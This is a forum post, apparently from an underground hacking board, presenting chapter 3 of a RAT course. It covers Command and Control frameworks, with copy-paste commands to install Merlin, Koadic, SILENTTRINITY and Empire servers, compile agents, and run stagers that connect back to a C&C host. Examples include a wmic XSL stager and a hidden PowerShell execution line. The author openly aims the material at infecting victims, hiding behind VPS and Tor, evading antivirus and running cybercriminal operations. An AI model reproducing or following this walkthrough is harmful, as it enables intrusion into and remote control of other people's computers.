var unreadAlerts = '1';
You have one unread private message from dkota titled Welcome to the Forum!

Funshine's Tail of a RAT Ch.3 C&C
#1
Chapter 3:Command and Control
This chapter is about getting to know the Command and Control (C&C) frameworks currently available to you and showing you how to use them. This chapter is NOT about making them FUD and getting these frameworks around AV as the overall goal is to build up your knowledge surrounding these tools.

It's very important to understand that C&C frameworks are meant for POST EXPLOITATION. This means you upload them to an infected computer after you already have access to it.


IMPORTANT



You must follow along exactly as everything is laid out in this course AND you need to use the same operating systems that I'm using when following along. That way no one has any fucking problems. I've chosen to use Ubuntu as a C&C server since most VPS, hacked servers, etc. allow easy deployment/installation of Ubuntu as an OS and I will also be using Windows 10 in a VM.

If you're following along thinking everything will work on your CentOS VM this is not the case. Follow along properly to avoid problems. Everything has been tested and the syntax is provided to you so you can copy/paste it all when going through everything without major difficulties.

In this course you'll be using Windows 10, Ubuntu VM, and Kali in a VM when following along with the examples later on. In this chapter we'll setup everything so we're all on the same page. You can use your main Windows computer if you choose to do so but I recommend downloading the Windows 10 ISO from the link below and creating a virtual machine out of it. That way you can isolate everything to that VM and not affect your main computer (if you use Windows) in case something goes to fuck on you.

I'd recommend if you're already a Windows 10 user to enter your product key when installing the Windows 10 ISO file to register it so you have the full capabilities of Windows in a VM. That way you can feel confident that the Windows 10 you're working with is exactly like the targets you'll be going after. If you do not have a Windows 10 activation key then either go buy a copy of Windows 10 or use the trial version from the link below while following along.



Target computer - Windows 10 VM fully updated with AV turned off!
C&C server - Ubuntu VM



Windows 10 download link:
https://www.microsoft.com/en-us/software...ndows10ISO

Ubuntu download link:
https://ubuntu.com/download/desktop

Our target computer will be the fully updated Windows 10 VM and we'll be using Ubuntu in a VM to install our Command and Control (C&C) tools.

Before we continue, please disable Windows Defender (WD). Disabling WD is ideal when you're first using these tools so you get a handle on the horse before going up against WD, or any other AV for that matter, by yourself. Please turn off WD or you'll encounter issues when using these tools.

It's important to note that you cannot expect any of these frameworks to bypass AV/WD right out of the box. You will need to customize all payloads prior to deploying any of them onto a Windows 10 computer running Windows Defender installed with default settings enabled.

The point of learning Command and Control frameworks is to get you familiar with these frameworks and to understand why it's important to know how to edit the code templates to bypass WD on your own. Sometimes this can be as simple as changing a few strings within the code but don't be fooled as this can be a trial and error type of process leading to a time consuming adventure.



Alright, it's assumed you have Windows 10, Ubuntu, and Kali installed in a VM moving forward. Let's go ahead and start our Windows 10 VM and update everything on it before continuing. Once you have fully updated your Windows 10 VM we can then disable Windows Defender.



Disabling Windows Defender
In your Windows 10 VM go to the search bar within the taskbar and search for "Windows Security". Click on "Virus & Threat protection". Under "Virus & Threat protection settings" click on "Manage Settings" to be presented with the screen as seen in the screenshot below.


Now turn OFF all of those (4) settings so your screen looks like mine in the screenshot below.


Great! Now we're ready to move forward to test these tools.

Also, It's a good idea to take a snapshot of your updated Windows 10 VM so you can revert back to it when going through each tool for the first time. As always use a fresh VM when testing out each tool so nothing gets fucked along the way.

Alright let's get at it.


Command and Control (C&C)


Command and Control (C&C) goes hand in hand with most RATs and other strains of malware available out there these days. In this chapter we're going to explore what a C&C server is and then we'll setup most of the C&C frameworks available today which are also widely used by other APTs across the world. It's important to note that C&C frameworks (Metasploit, Merlin, Koadic, PowerShell Empire, etc.) are just that, they're frameworks that are meant for you to build upon. These C&C frameworks take care of most of the heavy lifting such as communications, encryption, plug-ins, templates, etc. but most of the modules available are already detected by AV.

Do not solely rely on these frameworks to work out of the box on an updated Windows 10/11 computer. Some will function as expected but most of these frameworks will require some tweaking (which we'll get into later on) to evade AV.

We'll briefly touch on C&C basics and then go through each C&C framework one by one. There are plently more C&C frameworks out there but I'm focusing on the ones that are widely used and available to most.

Alright let's get into the basics.

Command and Control is also known as C&C and C2 but we'll be using the term C&C throughout this course. These servers are used by hackers to maintain communications with all the compromised computers across the world they have access to so they're much easier to manage. C&C servers are responsible for constantly checking in with the infected computers that way we have a dashboard where we can see our full inventory of the amount of people infected, type of host, and the locations of all our infected victims.

Imagine having 1000s of infected computers and you need to login into each one to execute a single command? How fucking annoying is that? (it was). By using C&C servers we can have all our infected victims connect back to (1) server so we can issue commands to the masses. Simple shit yes?

Once the malware executes on a computer the C&C server can be used to command it to duplicate, spread, execute specific commands or update itself. This is all controlled by the attacker (you). Once a computer has been infected it sends a signal back to the C&C waiting for further commands or can upload content back to it for you so you're able to view it later on. You can then take control of the infected computer in much the same way that tech support staff might assume control of your computer while fixing a problem. The computer then becomes a "bot", "slave", or a "zombie" under your control. There are so many terms for infected computers so pick the one you think is cool.

I'm more of a bot person but you guys do you.



Anyways, This all makes sense. Right? Once we infect a specific computer we want a way to communicate directly with that computer to do our bidding whether that is displaying a prompt to the victim, launching a file, extracting online credentials, or downloading and installing other pieces of malware (ransomware, adware, etc.).

C&Cs are almost always hosted in the cloud, on hacked servers, VPS, VPN with port forwarding, etc. but have also been known to use social media platforms, Twitter, Telegram, IRC, etc. to communicate with compromised systems.

One of the reasons you want to use a C&C server is to distance yourself from the infected computer directly by having the infected computer connect back to your C&C. You can host these C&C servers anywhere and it's best to host them on a VPS and connect into them via SSH over Tor for OPSec precautions. As always keep OPSec in mind and don't have your victims connect back to you directly or connect directly with the C&C as this would be silly.

When/if you have infected a lot of people you want to maintain access to those computers with ease and be able to issue commands to all infected computers all at once if needed. C&C servers make it very easy to manage a large amount of infected computers at once and are required in today's day and age if you plan on infecting many peoples.

The thing that people get all fucked up about when it comes to using C&Cs frameworks is that these frameworks are meant to be deployed AFTER you've compromised someone and already have them infected with your RAT/XYZ malware.



There are many C&C frameworks out there but we're going to focus on the ones that have been used by other cybercriminal organizations, government hackers, and nation state actors so we can install and deploy them as we see fit.

If government hackers and other cybercriminal gangs are using these tools then they're good enough for us too.



Now, before we continue it's good to know how to use each of these tools separately. It can be overwhelming when trying to learn these tools for the first time since they have different syntax, requirements, commands, etc. so before we continue you need to have a solid foundation on how to use these tools interchangeably.

The C&C frameworks available today are all different in their own right but they all have similar usage/syntax and navigations commands. What I mean is once you've learned how to use one C&C framework you'll feel comfortable and confident in using them all interchangeably.

In order to feel comfortable you'll need to get some experience with using these and the best tool to help build a solid knowledge foundation in C&C frameworks is Metasploit. Getting comfortable with the Terminal, navigating the command line interface (CLI), search function, setting it up, adding hosts, etc. will help you greatly when dealing with the other C&C frameworks since they're all somewhat similar to use and navigate around with.

Before continuing you must read the textbooks in the link below and get comfortable with using Metasploit focusing on specifically using the syntax and navigating within the Metasploit console. It should be noted if you're going to practice with Metasploit then you need to disable all AV settings on your Windows/macOS test computers so your payloads will function without difficulties. If you don't disable the AV then this exercise is useless. The point is to get familiar with these tools so don't worry about getting them past AV quite yet but instead jut focus on getting comfortable using it properly. Once you have the basics down with some experience behind you we can expand on that.



You can also order these textbooks online so you have the physical copy at your disposal if you choose to do so which is a Google search away.

Do this now. Once you've read through those books you can continue on in this course.

When you've read the required textbooks and feel comfortable using Metasploit scroll down to continue.



Command and Control (C&C) Frameworks

Metasploit


We're not going to go into much detail into how to use Metasploit since you should've already gone through Metasploit on your own and read through the related textbooks provided. It's an excellent C&C framework but it's used so much these days that most, if not all, of the default payloads will be flagged by AV. We'll get into how to make them bypass AV in the Evasion chapter but for now it's assumed you're familiar with the Metasploit console, navigating within it, and using some of the payloads/modules.

Since you should be familiar with how to use this tool we can move onto the more known C&C frameworks available that function relatively the same and should be easy to pick up and use.


Merlin


https://github.com/Ne0nd0g/merlin

Merlin is a cross-platform post exploitation Command & Control server and Agent that is written in the GO programming language. Merlin is still pretty new in its development so you might experience some hiccups and bugs along the way but this framework is an excellent addition to your arsenal. It can run on Linux, Windows, and pretty much on any platform supported by the GO runtime. This framework operates by a server (C&C) and an agent (the file used to infect people) which can be a regular executable (.exe) or a .DLL file.

Before we use Merlin we need to setup our C&C server in our Ubuntu VM and install the Golang environment so we're able to customize the agent and add post exploitation modules to it as needed.


Open up Terminal in your Ubuntu VM and type:
sudo apt-get update && sudo apt-get dist-upgrade -y
sudo add-apt-repository ppa:longsleep/golang-backports
sudo apt update && sudo apt-get install golang-go make gcc-mingw-w64 net-tools git p7zip-full -y
sudo wget https://github.com/Ne0nd0g/merlin/releas...nux-x64.7z
sudo 7z x -pmerlin -omerlin merlinServer-Linux-x64.7z
sudo chown -R $USER:$USER merlin
cd merlin/data/x509
openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=infosecinstitute" -days 7
cd ~/merlin
git clone https://github.com/Ne0nd0g/merlin-agent
git clone https://github.com/Ne0nd0g/merlin-agent-dll

Next you will need to compile an agent so we can use that to deliver to our Windows 10 computer. Select the Windows syntax below to create yours or compile a different one for an OS of your choosing.

cd merlin-agent
make windows
- Makes a Windows Merlin agent.
make linux - Makes a Linux Merlin agent.
make darwin - Makes a macOS Merlin agent.

You can find your agent files in the "~/merlin/merlin-agent/bin" directory. This is the file you'll need to get executed on someone's computer to infect them with.

If you wanted to use a DLL Merlin agent then you would:
cd ~/merlin/merlin-agent-dll
make
- Makes the .dll file and places it into ~/merlin/merlin-agent-dll/bin/

If you wanted to execute the .dll file on the target machine you would:
In Windows command prompt type:
C:\WINDOWS\System32\rundll32.exe merlin.dll,Run https://Ubuntu-IP:443/



Before we execute the agent we need to setup Merlin C&C so it's listening for incoming connections in our Ubuntu VM.

In Terminal Ubuntu VM
cd ~/merin
sudo ./merlinServer-Linux-x64




You should see the same screen as in the screenshot above which means the Merlin C&C server is active but we need to still setup a listener for it so your "agents" can connect back to it.

In the Merlin console type the following:
listeners
use https
set Interface Your-Ubuntu VM-IP
info
start


OK we have our listener setup listening on port 443. Now we need to copy the Merlin Agent that we created before which should be in your ~/merlin/merlin-agent/bin folder. If you're confused please scroll up to see how to make a Windows Merlin Agent.

Copy the "merlinAgent-Windows-x64.exe" to your Windows 10 VM any way you please. Personally, I spin up a quick webserver with python3 and use Microsoft Edge to download it from my Ubuntu VM but you do whatever you feel comfortable with.


On your Windows 10 VM type:
merlinAgent-Windows-x64.exe -url http://<Your Ubuntu server IP>:443



Once you have executed that command on your Windows 10 VM you should get a connect back to the Merlin C&C in your Ubuntu VM as seen in the screenshot below.



Now we can see our sessions, interact with the infected host, and go through the commands within Merlin to see what is what. Remember, some will work and some will not.

In the Merlin console type the following:
main
agent list



interact SESSION-ID
My example: interact 13c8bd9b-dc8e-4fa9-83d0-58c7cff8903d
info
ls

To see the full menu type "help".

If you're wanting to use the modules within Merlin type "main" and then "use module" module_name. This is where knowing how to navigate with Metasploit will come in handy since it's pretty much the exact same. You should be able to navigate this on your own and explore the modules within Merlin.




It's a good idea to go through the manual too if you plan to dive deeper into using Merlin!


One thing I should mention is that there is always a delay when issuing a command to the infected host so try not to flip your shit or send an absurd number of commands at once. Just be patient and remember not everything works %100 of the time.

Lastly, at the time when I was first preparing this course the Merlin Agents were not detected by AV but it seems Windows Defender is picking up them now as of June 2022. Interestingly though that macOS doesn't pick them up at all so that helps if you have a iMac or MacBook to practice on.


Koadic


https://github.com/silocityit/koadic-1

Koadic C&C is a post exploitation C&C framework like other ethical hacking tools such as Metasploit and Empire. Koadic operates mostly by using Windows Script Host (WSH) to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way up to Windows 10+.

Koadic is strictly for Windows targets and nothing else.

Koadic makes is possible to deliver payloads completely in memory and uses cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).

Open up Terminal in your Ubuntu VM and type:
sudo apt-get update && sudo apt-get dist-upgrade -y
sudo apt-get install make git net-tools python3-pip -y
git clone https://github.com/silocityit/koadic-1.git koadic
cd koadic
pip3 install -r requirements.txt
chmod +x koadic
./koadic



We'll use one of the many stagers within koadic. You should've already learned about stagers if you read through the Metasploit resources but to sum it up a stager is just a file dropped onto a victim machine to get a connection back to the C&C in order to execute XYZ commands by you. This is mostly done in memory on the target computer.

The stager we'll use in this example will be an ActiveX object embedded in an XML style sheet document.

In the Koadic console type:
use stager/js/wmic
info
set ENDPOINT test
run


null


On Windows 10 VM open up command prompt and type:
wmic.exe os get /FORMAT:"http://<Your Ubuntu VM IP>:9996:/test.xsl"

Trying to run wmic.exe with WD enabled will result in "access denied". Some people try to rename wmic.exe to something else to help bypass AV (used to work - not so much now) but remember these tools are post exploitation!

You can rename the file like:
copy C:\Windows\System32\wbem\wmic.exe misosoup.exe

misosoup.exe os get /FORMAT:"http://<Your Ubuntu VM IP>:9996:/test.xsl"

Once you ran that command on your Windows 10 VM you'll receive a "zombie" in your koadic console as seen in the screenshot below.



We can then interact with it by entering "zombie" and the associated zombie ID number. In this example "Zombie 0" connected back so we'll interact with zombie 0 with the command "zombies 0" in Koadic console as seen in the screenshot below.



Once you have a zombie you can choose any of the available "implants" at your disposal with koadic which include obtaining passwords, phishing, pivoting, etc.







SILENTTRINITY


https://github.com/byt3bl33d3r/SILENTTRINITY

SILENTTRINITY is modern, asynchronous, multiplayer & multiserver C&C post exploitation framework powered by Python 3 and .NETs DLR. This tool is still being worked on and is relatively new to most people out there so expect some problems and bugs as you use this tool but has much potential in my eyes.

This C&C framework utilizes Boo-Lang instead of the traditional PowerShell, Windows Script Host, etc.

This framework is great if you're working with other hackers/cybercriminals and want to play "multiplayer" on your targets and how to manage them as a group.


Open up Terminal in Ubuntu and type:
sudo apt-get update && sudo apt-get dist-upgrade -y
sudo apt-get install make git net-tools pipenv python3-pip -y
git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git
cd SILENTTRINITY
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt


Now we need to setup the SILENTTRINITY server.
python3 st.py teamserver Ubuntu-IP PASSWORD
My example: python3 st.py teamserver 192.168.0.78 PASSWORD

Leave the SILENTTRINITY server window open and open a new Terminal window:
python3 st.py client wss://usernameASSWORD@Ubuntu-IP:5000

"username" can be changed to anything as this is what you would login with as if you were in a group. Each member could replace "username" with whatever they please to login and interact with the target(s).



In the SILENTTRINITY console type:
listeners
use https
set CallBackUrls TEST
set PORT 9000
start
list
stagers
use powershell_stageless
generate https



null


Copy the stager.ps1 to your Windows 10 VM any way you please. Personally, I spin up a quick webserver with python3 and use Microsoft Edge to download it from my Ubuntu VM but you do whatever you feel comfortable with.

On Windows 10 VM open up command prompt where you downloaded stager.ps1 and type:
powershell -ExecutionPolicy Bypass -Windowstyle Hidden -File ./stager.ps1

You will receive a connection back to your SILENTTRINTY console as seen in the screenshot below.



Now we can use the sessions command to see our session.

In the SILENTTRINITY console type:
sessions
list


To make things easier, lets rename this session.

rename SESSION_ID NEW_NAME
list



Let's go ahead and check a simple example.

In the SILENTTRINITY console type:
modules
use boo/shell
set Command whoami
run Win

Remember that "Win" is what I renamed the session Name to.



Some things to note are if you try to use a stager on a port lower than 1000 and you did NOT run pipenv with a root account it will not work. If you see something saying "permission denied" this is most likely why. Change the Port to 9000 or something like this. Some modules require to be executed in an elevated prompt (mimikatz, etc.) so pay attention to which ones will work right away and the others you'll need to elevate your privileges with.

There are other modules available and people contribute to the project from time to time but get familiar with it and see what floats your boat.



PowerShell Empire


https://github.com/BC-SECURITY/Empire
https://www.bc-security.org/blog


Empire is a post exploitation framework that includes a pure PowerShell Windows agents, Python 3.x Linux/OS X agents, and C# agents. This framework offers cryptological secure communications and a flexible architecture. This framework also utilizes "Donut" which effectively executes payloads within memory on the target computer.

Empire implements the ability to run PowerShell agents without needing powershell.exe and has rapidly deployable post exploitation modules ranging from key loggers, Mimikatz, and adaptable communications to evade network detection which are all wrapped up in a usability-focused framework.

For Empire we'll use Kali in a VM to host it and a Windows 10 computer as our victim.

In your Kail VM type:
sudo powershell-empire server
Keep that window open and running.

In a new Terminal window type:
sudo powershell-empire client
uselistener http
set Port 9010
execute



Now we'll generate an executable.

In your Kail VM type:
usestager windows/cmd_exec
execute



In the screenshot above you can see where the Empire agent is located which we'll need to move over onto our Windows 10 VM. Once the Empire Agent is executed on your Windows 10 VM you'll get a connection back as seen in the screenshot below.



We interact with Agents by typing:
interact AGENT
My example:
interact 1VZ46XSA

Now we can load any modules we see fit and have them executed on our Windows 10 VM. Just like Metasploit you'll issue "usemodule" and then select the module you want to run on the target machine. Typing "options" once you've loaded the module will display what's needed before you execute it.

Alright, you should be comfortable using C&Cs with installing, getting them setup, and practicing with the C&C frameworks talked about in this chapter. The point of all of this is to get yourself familiar with using these types of frameworks so you're comfortable using them but more importantly for when any new frameworks/techniques get released so you're ready to pounce. I want to point out that when these frameworks were first released their payloads were FUD for quite some time until Microsoft and every other AV out there picked them up rendering most of the payload detected. This is why you want to be on top of cyber security news and the newest tools being released as this can make it much easier on you.

Since all these C&C frameworks are open source you're able to edit the modules, implants, etc. to your liking which is exactly how you make everything FUD for your operations. We're not going to focus on how to do this right now but I want you to understand that if you're familiar with these tools, know a little about going through the source code to change a few things, follow everything cybersecurity related on whatever social media you use, and keep an eye out for 0-days/new tools to be released because you'll be in a much better position when something new comes along. New tools are released all the time.

Always be ready to pounce on an opportunity because when a new exploit is released you'll have the knowledge to use it .

Being a cybercriminal at our level is about opportunity and timing, for the most part, depending on your skill level and how far you want to take it.

That being said many of the people reading this probably won't be at a level needed to go through the source code and edit everything to bypass WD. If this is the case then you need to accept your fate knowing what your max technical skill level may be and understand that you fall into the category of purchasing your cyber weapons (malware) for your operations which is totally OK too.

Now you know what C&C frameworks are and the most common ones used today let's get into the RAT community
Report


Quick Reply
Message
Type your reply to this message here.



Possibly Related Threads…
Thread Author Replies Views Last Post
  Funshine's The Tale of a RAT Ch.1 Omien 4 304 05-28-2023, 12:57 PM
Last Post: DeSnake
  Funshine's Tail of a RAT Ch. 6-7 Malware Delivery Omien 0 189 05-01-2023, 11:08 AM
Last Post: Omien
  Funshine's Tale of a RAT Ch.5 Evasion Omien 0 165 05-01-2023, 10:51 AM
Last Post: Omien
  Funshine's Tail of a RAT Ch.4 RATS Omien 0 168 05-01-2023, 10:42 AM
Last Post: Omien
  Funshine's Tail of a RAT Ch.2 Omien 0 213 05-01-2023, 10:07 AM
Last Post: Omien



Users browsing this thread: purely_cabbage
var thread_deleted = "0"; if(thread_deleted == "1") { $("#quick_reply_form, .new_reply_button, .thread_tools, .inline_rating").hide(); $("#moderator_options_selector option.option_mirage").attr("disabled","disabled"); }